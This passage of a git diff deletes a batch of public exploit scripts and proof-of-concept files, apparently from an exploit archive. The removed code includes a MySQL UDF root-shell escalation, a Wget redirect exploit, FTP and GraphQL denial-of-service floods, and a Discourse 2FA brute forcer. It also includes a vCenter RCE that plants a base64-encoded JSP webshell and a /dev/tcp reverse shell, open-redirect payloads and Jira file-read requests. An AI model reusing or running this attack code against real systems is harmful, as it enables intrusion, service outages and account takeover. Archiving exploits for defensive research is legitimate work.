" % argv[0]
-
-#username=sys.argv[1];
-#password=sys.argv[2];
-###
-
-parser = argparse.ArgumentParser()
-parser.add_argument('--username', '-u', help='MySQL username', type=str, required=True)
-parser.add_argument('--password', '-p', help='MySQL password', type=str)
-
-args = parser.parse_args()
-
-username=args.username
-password=args.password
-
-if not password:
- password=''
-
-cmd='mysql -u root -p\'' + password + '\' -e "select @@plugin_dir \G"'
-plugin_str = subprocess.check_output(cmd, shell=True)
-plugin_dir = re.search('@plugin_dir: (\S*)', plugin_str)
-res = bool(plugin_dir)
-
-if not res:
- print("Error: could not locate the plugin directory")
- os.exit(1);
-
-plugin_dir_ = plugin_dir.group(1)
-
-print("Plugin dir is %s" % plugin_dir_)
-
-# file to save the udf so file to
-udf_filename = 'udf' + str(random.randint(1000,10000)) + '.so'
-udf_outfile = plugin_dir_ + udf_filename
-
-# alternative way:
-# set @outputpath := @@plugin_dir; set @outputpath := @@plugin_dir;
-
-print("Trying to create a udf library...");
-os.system('mysql -u root -p\'' + password + '\' -e "select binary 0x' + shellcode + ' into dumpfile \'%s\' \G"' % udf_outfile)
-res = os.path.isfile(udf_outfile)
-
-if not res:
- print("Error: could not create udf file in %s (mysql is either not running as root or may be file exists?)" % udf_outfile)
- os.exit(1);
-
-print("UDF library created successfully: %s" % udf_outfile);
-print("Trying to create sys_exec...")
-os.system('mysql -u root -p\'' + password + '\' -e "create function sys_exec returns int soname \'%s\'\G"' % udf_filename)
-
-print("Checking if sys_exec was created...")
-cmd='mysql -u root -p\'' + password + '\' -e "select * from mysql.func where name=\'sys_exec\' \G"';
-res = subprocess.check_output(cmd, shell=True);
-
-if (res == ''):
- print("sys_exec was not found (good luck next time!)")
-
-if res:
- print("sys_exec was found: %s" % res)
- print("Generating a SUID binary in /var/www/bash...")
- os.system('mysql -u root -p\'' + password + '\' -e "select sys_exec(\'cp /bin/bash /var/www/bash && chmod +s /var/www/bash\')"')
-
- print("Trying to spawn a root shell...")
- os.system("cd /var/www && ./bash -p")
\ No newline at end of file
diff --git a/exploits/linux/remote/49815.py b/exploits/linux/remote/49815.py
deleted file mode 100755
index 4c734776d..000000000
--- a/exploits/linux/remote/49815.py
+++ /dev/null
@@ -1,54 +0,0 @@
-# Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2)
-# Original Exploit Author: Dawid Golunski
-# Exploit Author: liewehacksie
-# Version: GNU Wget < 1.18
-# CVE: CVE-2016-4971
-
-import http.server
-import socketserver
-import socket
-import sys
-
-class wgetExploit(http.server.SimpleHTTPRequestHandler):
-
- def do_GET(self):
- # This takes care of sending .wgetrc/.bash_profile/$file
-
- print("We have a volunteer requesting " + self.path + " by GET :)\n")
- if "Wget" not in self.headers.get('User-Agent'):
- print("But it's not a Wget :( \n")
- self.send_response(200)
- self.end_headers()
- self.wfile.write("Nothing to see here...")
- return
-
- self.send_response(301)
- print("Uploading " + str(FILE) + "via ftp redirect vuln. It should land in /home/ \n")
- new_path = 'ftp://anonymous@{}:{}/{}'.format(FTP_HOST, FTP_PORT, FILE)
-
- print("Sending redirect to %s \n"%(new_path))
- self.send_header('Location', new_path)
- self.end_headers()
-
-
-HTTP_LISTEN_IP = '192.168.72.2'
-HTTP_LISTEN_PORT = 80
-FTP_HOST = '192.168.72.4'
-FTP_PORT = 2121
-FILE = '.bash_profile'
-
-handler = socketserver.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)
-
-print("Ready? Is your FTP server running?")
-
-sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-result = sock.connect_ex((FTP_HOST, FTP_PORT))
-if result == 0:
- print("FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT))
-else:
- print("FTP is down :( Exiting.")
- exit(1)
-
-print("Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT)
-
-handler.serve_forever()
\ No newline at end of file
diff --git a/exploits/multiple/dos/49489.html b/exploits/multiple/dos/49489.html
deleted file mode 100644
index ab2eb85d2..000000000
--- a/exploits/multiple/dos/49489.html
+++ /dev/null
@@ -1,36 +0,0 @@
-# Exploit Title: jQuery UI 1.12.1 - Denial of Service (DoS)
-# Date: 20 Jan, 2021
-# Exploit Author: Rafael Cintra Lopes
-# Vendor Homepage: https://jqueryui.com/
-# Software Link: https://jqueryui.com/download/
-# Version: <= 1.12.1
-# CVE : CVE-2020-28488
-
-
-
-
-
-
- DoS - jQuery UI 1.12.1
-
-
- DoS - jQuery UI 1.12.1
-
-
-
-
-
- PoC by Rafael Cintra Lopes
-
-
-
-
-
-
-
\ No newline at end of file
diff --git a/exploits/multiple/dos/49697.py b/exploits/multiple/dos/49697.py
deleted file mode 100755
index 9f99a6189..000000000
--- a/exploits/multiple/dos/49697.py
+++ /dev/null
@@ -1,101 +0,0 @@
-# Exploit Title: ProFTPD 1.3.7a - Remote Denial of Service
-# Date: 22/03/2021
-# Exploit Author: xynmaps
-# Vendor Homepage: http://www.proftpd.org/
-# Software Link: https://github.com/proftpd/proftpd
-# Version: 1.3.7a
-# Tested on: Parrot Security OS 5.9.0
-
-#-------------------------------#
-
-#encoding=utf8
-#__author__ = XYN/Dump/NSKB3
-#ProFTPD Denial of Service exploit by XYN/Dump/NSKB3.
-"""
-ProFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
-you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
-(if it's limited, just run this script from different proxies using proxychains, and it will work)
-"""
-
-import socket
-import sys
-import threading
-import subprocess
-import time
-
-banner = """
-._________________.
-| ProFTPD |
-| D o S |
-|_________________|
-|By XYN/DUMP/NSKB3|
-|_|_____________|_|
-|_|_|_|_____|_|_|_|
-|_|_|_|_|_|_|_|_|_|
-
-"""
-usage = "{} ".format(sys.argv[0])
-
-def test(t,p):
- s = socket.socket()
- s.settimeout(10)
- try:
- s.connect((t, p))
- response = s.recv(65535)
- s.close()
- return 0
- except socket.error:
- print("Port {} is not open, please specify a port that is open.".format(p))
- sys.exit()
-def attack(targ, po, id):
- try:
- subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
- #print("Worker {} running".format(id))
- except OSError: pass
-def main():
- global target, port, start
- print banner
- try:
- target = sys.argv[1]
- except:
- print usage
- sys.exit()
- try:
- port = int(sys.argv[2])
- except:
- port = 21
- try:
- conns = int(sys.argv[3])
- except:
- conns = 50
- print("[!] Testing if {0}:{1} is open".format(target, port))
- test(target, port)
- print("[+] Port {} open, starting attack...".format(port))
- time.sleep(2)
- print("[+] Attack started on {0}:{1}!".format(target, port))
- def loop(target, port, conns):
- global start
- threading.Thread(target=timer).start()
- while 1:
- for i in range(1, conns + 3):
- t = threading.Thread(target=attack, args=(target,port,i,))
- t.start()
- if i > conns + 2:
- t.join()
- break
- loop()
-
- t = threading.Thread(target=loop, args=(target, port, conns,))
- t.start()
-
-def timer():
- start = time.time()
- while 1:
- if start < time.time() + float(900): pass
- else:
- subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
- t = threading.Thread(target=loop, args=(target, port,))
- t.start()
- break
-
-main()
\ No newline at end of file
diff --git a/exploits/multiple/dos/49773.py b/exploits/multiple/dos/49773.py
deleted file mode 100755
index beaa01d3a..000000000
--- a/exploits/multiple/dos/49773.py
+++ /dev/null
@@ -1,101 +0,0 @@
-# Exploit Title: glFTPd 2.11a - Remote Denial of Service
-# Date: 15/05/2021
-# Exploit Author: xynmaps
-# Vendor Homepage: https://glftpd.io/
-# Software Link: https://glftpd.io/files/glftpd-LNX-2.11a_1.1.1k_x64.tgz
-# Version: 2.11a
-# Tested on: Parrot Security OS 5.9.0
-
-#-------------------------------#
-
-#encoding=utf8
-#__author__ = XYN/Dump/NSKB3
-#glFTPd Denial of Service exploit by XYN/Dump/NSKB3.
-"""
-glFTPd only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
-you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
-(if it's limited, just run this script from different proxies using proxychains, and it will work)
-"""
-
-import socket
-import sys
-import threading
-import subprocess
-import time
-
-banner = """
-._________________.
-| glFTPd |
-| D o S |
-|_________________|
-|By XYN/DUMP/NSKB3|
-|_|_____________|_|
-|_|_|_|_____|_|_|_|
-|_|_|_|_|_|_|_|_|_|
-
-"""
-usage = "{} ".format(sys.argv[0])
-
-def test(t,p):
- s = socket.socket()
- s.settimeout(10)
- try:
- s.connect((t, p))
- response = s.recv(65535)
- s.close()
- return 0
- except socket.error:
- print("Port {} is not open, please specify a port that is open.".format(p))
- sys.exit()
-def attack(targ, po, id):
- try:
- subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
- #print("Worker {} running".format(id))
- except OSError: pass
-def main():
- global target, port, start
- print banner
- try:
- target = sys.argv[1]
- except:
- print usage
- sys.exit()
- try:
- port = int(sys.argv[2])
- except:
- port = 21
- try:
- conns = int(sys.argv[3])
- except:
- conns = 50
- print("[!] Testing if {0}:{1} is open".format(target, port))
- test(target, port)
- print("[+] Port {} open, starting attack...".format(port))
- time.sleep(2)
- print("[+] Attack started on {0}:{1}!".format(target, port))
- def loop(target, port, conns):
- global start
- threading.Thread(target=timer).start()
- while 1:
- for i in range(1, conns + 3):
- t = threading.Thread(target=attack, args=(target,port,i,))
- t.start()
- if i > conns + 2:
- t.join()
- break
- loop()
-
- t = threading.Thread(target=loop, args=(target, port, conns,))
- t.start()
-
-def timer():
- start = time.time()
- while 1:
- if start < time.time() + float(900): pass
- else:
- subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
- t = threading.Thread(target=loop, args=(target, port,))
- t.start()
- break
-
-main()
\ No newline at end of file
diff --git a/exploits/multiple/dos/49789.py b/exploits/multiple/dos/49789.py
deleted file mode 100755
index c2c02f7a2..000000000
--- a/exploits/multiple/dos/49789.py
+++ /dev/null
@@ -1,50 +0,0 @@
-# Exploit Title: Hasura GraphQL 1.3.3 - Denial of Service
-# Software: Hasura GraphQL
-# Software Link: https://github.com/hasura/graphql-engine
-# Version: 1.3.3
-# Author: Dolev Farhi
-# Date: 4/19/2021
-# Tested on: Ubuntu
-
-import sys
-import requests
-import threading
-
-HASURA_SCHEME = 'http'
-HASURA_HOST = '192.168.1.1'
-HASURA_PORT = 80
-THREADS = 300
-
-def create_table():
- data = {"type":"bulk","args":[{"type":"run_sql","args":{"sql":"CREATE TABLE \"public\".\"test_db\"(\"test\" text NOT NULL, PRIMARY KEY (\"test\") );","cascade":False,"read_only":False}},{"type":"add_existing_table_or_view","args":{"name":"test_db","schema":"public"}}]}
- endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
- r = requests.post(endpoint, json=data)
- return r
-
-def insert_row():
- bomb = 'A' * 100000
- data = {"type":"insert","args":{"table":{"name":"test_db","schema":"public"},"objects":[{"test":bomb}],"returning":[]}}
- endpoint = '{}://{}:{}/v1/query'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
- r = requests.post(endpoint, json=data)
- return r
-
-def DoS():
- dups = 'test \n ' * 1000000
- data = {'query': 'query { test_db { ' + dups + '} }'}
- endpoint = '{}://{}:{}/v1/graphql'.format(HASURA_SCHEME, HASURA_HOST, HASURA_PORT)
- r = requests.post(endpoint, json=data)
- return r
-
-if not create_table().ok:
- print('something went wrong, could not create table.')
- sys.exit(1)
-
-if not insert_row().ok:
- print('something went wrong, could not insert row')
- sys.exit(1)
-
-while True:
- for _ in range(THREADS):
- print('Starting')
- t = threading.Thread(target=DoS, args=())
- t.start()
\ No newline at end of file
diff --git a/exploits/multiple/remote/49719.py b/exploits/multiple/remote/49719.py
deleted file mode 100755
index b5ca35382..000000000
--- a/exploits/multiple/remote/49719.py
+++ /dev/null
@@ -1,101 +0,0 @@
-# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
-# Date: 22-03-2021
-# Exploit Author: xynmaps
-# Vendor Homepage: https://security.appspot.com/vsftpd.html
-# Software Link: https://security.appspot.com/downloads/vsftpd-3.0.3.tar.gz
-# Version: 3.0.3
-# Tested on: Parrot Security OS 5.9.0
-
-#-------------------------------#
-
-#encoding=utf8
-#__author__ = XYN/Dump/NSKB3
-#VSFTPD Denial of Service exploit by XYN/Dump/NSKB3.
-"""
-VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
-you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
-(if it's limited, just run this script from different proxies using proxychains, and it will work)
-"""
-
-import socket
-import sys
-import threading
-import subprocess
-import time
-
-banner = """
-._________________.
-| VS-FTPD |
-| D o S |
-|_________________|
-|By XYN/DUMP/NSKB3|
-|_|_____________|_|
-|_|_|_|_____|_|_|_|
-|_|_|_|_|_|_|_|_|_|
-
-"""
-usage = "{} ".format(sys.argv[0])
-
-def test(t,p):
- s = socket.socket()
- s.settimeout(10)
- try:
- s.connect((t, p))
- response = s.recv(65535)
- s.close()
- return 0
- except socket.error:
- print("Port {} is not open, please specify a port that is open.".format(p))
- sys.exit()
-def attack(targ, po, id):
- try:
- subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
- #print("Worker {} running".format(id))
- except OSError: pass
-def main():
- global target, port, start
- print banner
- try:
- target = sys.argv[1]
- except:
- print usage
- sys.exit()
- try:
- port = int(sys.argv[2])
- except:
- port = 21
- try:
- conns = int(sys.argv[3])
- except:
- conns = 50
- print("[!] Testing if {0}:{1} is open".format(target, port))
- test(target, port)
- print("[+] Port {} open, starting attack...".format(port))
- time.sleep(2)
- print("[+] Attack started on {0}:{1}!".format(target, port))
- def loop(target, port, conns):
- global start
- threading.Thread(target=timer).start()
- while 1:
- for i in range(1, conns + 3):
- t = threading.Thread(target=attack, args=(target,port,i,))
- t.start()
- if i > conns + 2:
- t.join()
- break
- loop()
-
- t = threading.Thread(target=loop, args=(target, port, conns,))
- t.start()
-
-def timer():
- start = time.time()
- while 1:
- if start < time.time() + float(900): pass
- else:
- subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
- t = threading.Thread(target=loop, args=(target, port,))
- t.start()
- break
-
-main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/49780.py b/exploits/multiple/webapps/49780.py
deleted file mode 100755
index 2eb77516e..000000000
--- a/exploits/multiple/webapps/49780.py
+++ /dev/null
@@ -1,70 +0,0 @@
-# Exploit Title: Discourse 2.7.0 - Rate Limit Bypass leads to 2FA Bypass
-# Date: 14/01/2021
-# Exploit Author: Mesh3l_911
-# Vendor Homepage: https://www.discourse.org/
-# Software Link:https://github.com/discourse/discourse
-# Version: Discourse 2.7.0
-# CVE: CVE-2021-3138
-
-import requests
-
-username = input("\n input ur username : ")
-password = input("\n input ur password : ")
-session=requests.session()
-
-proxies = []
-def proxies():
- proxies_path = input("\n input ur proxies path : ")
-
- with open(proxies_path, 'r') as prox:
- for _ in prox.read().splitlines():
- proxies.append()
-
-backup_codes = []
-def backup_list():
- Backup_codes = input("\n input ur Backup_codes list path : ")
-
- with open(Backup_codes, 'r') as codes:
- for _ in codes.read().splitlines():
- backup_codes.append()
-
-def exploit():
- with open('Backup_codes.txt', 'w') as results:
- try:
- for __ in proxies:
- for _ in codes.read().splitlines():
- header =\
- {
- "X-CSRF-Token": "ur X-CSRF-Token",
- "Cookie": "ur Cookie",
- "X-Requested-With": "XMLHttpRequest"
- }
- body = {"login": username, "password": password, "second_factor_token": _, "second_factor_method": "2"}
- request = session.post("ur target_url", headers=header, data=body, proxies={'http': __, 'https':__})
- source = request.text
- backup_codes.remove(_)
-
- if request.status_code == 200:
- if '"id"' in source:
- results.write("The Backup_Coude is > {} ".format(_))
- return True
- else:
- pass
- else:
- proxies.remove(__)
- break
-
-
- except requests.exceptions.SSLError and requests.exceptions.ConnectionError:
- print(" Connection Failed :( ")
-
- results.close()
-
-
-def main():
- if exploit():
- print("\n Found :) \n")
- else:
- print("\n Please re-check ur inputs :( \n")
-if __name__ == '__main__':
- main()
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50056.py b/exploits/multiple/webapps/50056.py
deleted file mode 100755
index 528c5d1e9..000000000
--- a/exploits/multiple/webapps/50056.py
+++ /dev/null
@@ -1,117 +0,0 @@
-# Exploit Title: VMware vCenter Server RCE 6.5 / 6.7 / 7.0 - Remote Code Execution (RCE) (Unauthenticated)
-# Date: 06/21/2021
-# Exploit Author: CHackA0101
-# Vendor Homepage: https://kb.vmware.com/s/article/82374
-# Software Link: https://www.vmware.com/products/vcenter-server.html
-# Version: This affects VMware vCenter Server (7.x before 7.0 U1c, 6.7 before 6.7 U3l and 6.5 before 6.5 U3n) and VMware Cloud Foundation (4.x before 4.2 and 3.x before 3.10.1.2).
-# Tested on: VMware vCenter version 6.5 (OS: Linux 4.4.182-1.ph1 SMP UTC 2019 x86_64 GNU/Linux)
-# CVE: 2021-21972
-
-# More Info: https://github.com/chacka0101/exploits/blob/master/CVE-2021-21972/README.md
-
-#!/usr/bin/python2
-
-import os
-import urllib3
-import argparse
-import sys
-import requests
-import base64
-import tarfile
-import threading
-import time
-
-urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
-
-myargs=argparse.ArgumentParser()
-myargs.add_argument('-T','--target',help='The IP address of the target',required=True)
-myargs.add_argument('-L','--local',help='Your local IP',required=True)
-args=myargs.parse_args()
-
-def getprompt(x):
- print ("(CHackA0101-GNU/Linux)$ "+ str(x))
-
-def getpath(path="/usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/37/0/h5ngc.war/resources/shell4.jsp"):
- fullpath="../" * 7 + path
- return fullpath.replace('\\','/').replace('//','/')
-
-def createbackdoor(localip):
- # shell4.jsp
- backdoor = "PGZvcm0gbWV0aG9kPSJHRVQiIGFjdGlvbj0iIj4KCTxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJjbWQiIC8+Cgk8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iRXhlYyEiIC8+CjwvZm9ybT4gPCUhCnB1YmxpYyBTdHJpbmcgZXNjKFN0cmluZyBzdHIpewoJU3RyaW5nQnVmZmVyIHNiID0gbmV3IFN0cmluZ0J1ZmZlcigpOwoJZm9yKGNoYXIgYyA6IHN0ci50b0NoYXJBcnJheSgpKQoJCWlmKCBjID49ICcwJyAmJiBjIDw9ICc5JyB8fCBjID49ICdBJyAmJiBjIDw9ICdaJyB8fCBjID49ICdhJyAmJiBjIDw9ICd6JyB8fCBjID09ICcgJyApCgkJCXNiLmFwcGVuZCggYyApOwoJCWVsc2UKCQkJc2IuYXBwZW5kKCImIyIrKGludCkoYyYweGZmKSsiOyIpOwoJcmV0dXJuIHNiLnRvU3RyaW5nKCk7Cn0gJT48JQpTdHJpbmcgY21kID0gcmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpOwppZiAoIGNtZCAhPSBudWxsKSB7CglvdXQucHJpbnRsbigiPHByZT5Db21tYW5kIHdhczogPGI+Iitlc2MoY21kKSsiPC9iPlxuIik7CglqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbSBpbiA9IG5ldyBqYXZhLmlvLkRhdGFJbnB1dFN0cmVhbShSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGNtZCkuZ2V0SW5wdXRTdHJlYW0oKSk7CglTdHJpbmcgbGluZSA9IGluLnJlYWRMaW5lKCk7Cgl3aGlsZSggbGluZSAhPSBudWxsICl7CgkJb3V0LnByaW50bG4oZXNjKGxpbmUpKTsKCQlsaW5lID0gaW4ucmVhZExpbmUoKTsKCX0KCW91dC5wcmludGxuKCI8L3ByZT4iKTsKfSAlPg=="
- backdoor = base64.b64decode(backdoor).decode('utf-8')
- f = open("shell4.jsp","w")
- f.write(backdoor)
- f.close()
- # reverse.sh
- # After decoding overwrite string 'CUSTOM_IP' for local IP
- shell="IyEvYmluL2Jhc2gKYmFzaCAtaSA+JiAvZGV2L3RjcC9DVVNUT01fSVAvNDQzIDA+JjE="
- shell=base64.b64decode(shell).decode('utf-8')
- shell=shell.replace('CUSTOM_IP',localip)
- f=open("reverse.sh","w")
- f.write(shell)
- f.close()
- # Move on with the payload
- payload_file=tarfile.open('payload.tar','w')
- myroute=getpath()
- getprompt('Adding web backdoor to archive')
- payload_file.add("shell4.jsp", myroute)
- myroute=getpath("tmp/reverse.sh")
- getprompt('Adding bash backdoor to archive')
- payload_file.add("reverse.sh", myroute)
- payload_file.close()
- # cleaning up a little bit
- os.unlink("reverse.sh")
- os.unlink("shell4.jsp")
- getprompt('Backdoor file just was created.')
-
-def launchexploit(ip):
- res=requests.post('https://' + ip + '/ui/vropspluginui/rest/services/uploadova', files={'uploadFile':open('payload.tar', 'rb')}, verify=False, timeout=60)
- if res.status_code == 200 and res.text == 'SUCCESS':
- getprompt('Backdoor was uploaded successfully!')
- return True
- else:
- getprompt('Backdoor failed to be uploaded. Target denied access.')
- return False
-
-def testshell(ip):
- getprompt('Looking for shell...')
- shell_path="/ui/resources/shell4.jsp?cmd=uname+-a"
- res=requests.get('https://' + ip + shell_path, verify=False, timeout=60)
- if res.status_code==200:
- getprompt('Shell was found!.')
- response=res.text
- if True:
- getprompt('Shell is responsive.')
- try:
- response=re.findall("b>(.+)uname -a')
- print(response)
- except:
- pass
- return True
- else:
- getprompt('Sorry. Shell was not found.')
- return False
-
-def opendoor(url):
- time.sleep(3)
- getprompt('Executing command.')
- requests.get(url, verify=False, timeout=1800)
-
-def executebackdoor(ip, localip):
- url="https://"+ip+"/ui/resources/shell4.jsp?cmd=bash%20/tmp/reverse.sh"
- t=threading.Thread(target=opendoor,args=(url,))
- t.start()
- getprompt('Setting up socket '+localip+':443')
- os.system('nc -lnvp 443')
-
-if len(sys.argv)== 1:
- myargs.print_help(sys.stderr)
- sys.exit(1)
-createbackdoor(args.local)
-uploaded=launchexploit(args.target)
-if uploaded:
- tested=testshell(args.target)
- if tested:
- executebackdoor(args.target, args.local)
-getprompt("Execution completed!")
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50079.txt b/exploits/multiple/webapps/50079.txt
deleted file mode 100644
index f0c612914..000000000
--- a/exploits/multiple/webapps/50079.txt
+++ /dev/null
@@ -1,39 +0,0 @@
-# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
-# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
-# Date: 2021-06-18
-# Exploit Author: Stig Magnus Baugstø
-# Vendor Homepage: https://scratch.mit.edu/
-# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
-# Version: 3.10.2
-# Tested on: Windows 10 x64, but should be platform independent.
-# CVE: CVE-2020-7750
-
-Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
-
-CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
-
-You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
-
-
-
-The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
-
-Example of regular cross-site scripting (XSS):
-
-
-
-The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
-
-
-
-The example above launches cmd.exe (Command Prompt) on Windows.
-
-For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
-
-Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50359.txt b/exploits/multiple/webapps/50359.txt
deleted file mode 100644
index a4e30e73a..000000000
--- a/exploits/multiple/webapps/50359.txt
+++ /dev/null
@@ -1,18 +0,0 @@
-# Exploit Title: PlaceOS 1.2109.1 - Open Redirection
-# Date: 29-09-2021
-# Exploit Author: Hamza Khedr @ Accenture Austalia AARO Team
-# Vendor Homepage: https://place.technology/
-# Software Link: https://github.com/PlaceOS
-# Version: < 1.29.10
-# Tested on: Ubuntu 20.04
-# CVE: CVE-2021-41826
-#
-#
-# PoC: "https://office.example.com/auth/logout?continue=//attacker.com"
-# "https://office.example.com/auth/logout?continue=.attacker.com"
-# "https://office.example.com/auth/logout?continue=:password@attacker.com"
-#
-#
-# Reference: https://github.com/PlaceOS/auth/issues/36
-# https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41826
-# https://nvd.nist.gov/vuln/detail/CVE-2021-41826
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50380.txt b/exploits/multiple/webapps/50380.txt
deleted file mode 100644
index 275fef744..000000000
--- a/exploits/multiple/webapps/50380.txt
+++ /dev/null
@@ -1,87 +0,0 @@
-# Exploit Title: Atlassian Jira Server/Data Center 8.16.0 - Arbitrary File Read
-# Date: 2021-10-05
-# Exploit Author: Mayank Deshmukh
-# Vendor Homepage: https://www.atlassian.com/
-# Software Link: https://www.atlassian.com/software/jira/download/data-center
-# Version: versions < 8.5.14, 8.6.0 ≤ version < 8.13.6, 8.14.0 ≤ version < 8.16.1
-# Tested on: Kali Linux & Windows 10
-# CVE : CVE-2021-26086
-
-POC File #1 - web.xml
-
-GET /s/cfx/_/;/WEB-INF/web.xml HTTP/1.1
-Host: 127.0.0.1:8080
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-Accept-Encoding: gzip, deflate
-Accept-Language: en-US,en;q=0.9
-Connection: close
-
-
-POC File #2 - seraph-config.xml
-
-GET /s/cfx/_/;/WEB-INF/classes/seraph-config.xml HTTP/1.1
-Host: 127.0.0.1:8080
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-Accept-Encoding: gzip, deflate
-Accept-Language: en-US,en;q=0.9
-Connection: close
-
-POC File #3 - decorators.xml
-
-GET /s/cfx/_/;/WEB-INF/decorators.xml HTTP/1.1
-Host: 127.0.0.1:8080
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-Accept-Encoding: gzip, deflate
-Accept-Language: en-US,en;q=0.9
-Connection: close
-
-
-POC File #4 - /jira-webapp-dist/pom.properties
-
-GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties HTTP/1.1
-Host: 127.0.0.1:8080
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-Accept-Encoding: gzip, deflate
-Accept-Language: en-US,en;q=0.9
-Connection: close
-
-POC File #5 - /jira-webapp-dist/pom.xml
-
-GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.xml HTTP/1.1
-Host: 127.0.0.1:8080
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-Accept-Encoding: gzip, deflate
-Accept-Language: en-US,en;q=0.9
-Connection: close
-
-POC File #6 - /atlassian-jira-webapp/pom.xml
-
-GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml HTTP/1.1
-Host: 127.0.0.1:8080
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
-Accept-Encoding: gzip, deflate
-Accept-Language: en-US,en;q=0.9
-Connection: close
-
-POC File #7 - /atlassian-jira-webapp/pom.properties
-
-GET /s/cfx/_/;/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.properties HTTP/1.1
-Host: 127.0.0.1:8080
-Upgrade-Insecure-Requests: 1
-User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
